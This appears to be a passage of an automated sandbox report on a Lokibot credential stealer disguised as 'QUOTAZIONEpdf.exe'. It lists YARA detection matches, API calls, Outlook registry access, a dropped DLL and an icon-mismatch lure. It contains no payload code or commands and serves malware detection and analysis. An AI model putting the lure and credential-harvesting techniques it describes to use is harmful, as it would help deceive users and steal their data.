          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_0040604C
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00404772
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_0040549C
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_004029D4
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: String function: 0041219C appears 45 times
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: String function: 00405B6F appears 42 times
          Source: QUOTAZIONEpdf.exe, 00000001.00000003.292277213.0000000003196000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTAZIONEpdf.exe
          Source: QUOTAZIONEpdf.exe, 00000001.00000003.292572602.000000000332F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTAZIONEpdf.exe
          Source: QUOTAZIONEpdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile read: C:\Users\user\Desktop\QUOTAZIONEpdf.exeJump to behavior
          Source: QUOTAZIONEpdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\QUOTAZIONEpdf.exe "C:\Users\user\Desktop\QUOTAZIONEpdf.exe"
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess created: C:\Users\user\Desktop\QUOTAZIONEpdf.exe "C:\Users\user\Desktop\QUOTAZIONEpdf.exe"
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess created: C:\Users\user\Desktop\QUOTAZIONEpdf.exe "C:\Users\user\Desktop\QUOTAZIONEpdf.exe"
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsr3B69.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/6@56/2
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00402012 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
          Source: Binary string: wntdll.pdbUGP source: QUOTAZIONEpdf.exe, 00000001.00000003.292355502.0000000003210000.00000004.00000001.sdmp, QUOTAZIONEpdf.exe, 00000001.00000003.296307100.0000000003080000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: QUOTAZIONEpdf.exe, 00000001.00000003.292355502.0000000003210000.00000004.00000001.sdmp, QUOTAZIONEpdf.exe, 00000001.00000003.296307100.0000000003080000.00000004.00000001.sdmp

          Data Obfuscation:

          barindex
          Yara detected aPLib compressed binaryShow sources
          Source: Yara matchFile source: 1.2.QUOTAZIONEpdf.exe.3040000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: QUOTAZIONEpdf.exe PID: 6352, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: QUOTAZIONEpdf.exe PID: 808, type: MEMORYSTR
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_72FB1000 push eax; ret
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_00402AC0 push eax; ret
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_00402AC0 push eax; ret
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp\tncvu.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Icon mismatch, binary includes an icon from a different legit application in order to fool usersShow sources
          Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (27).png
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOX
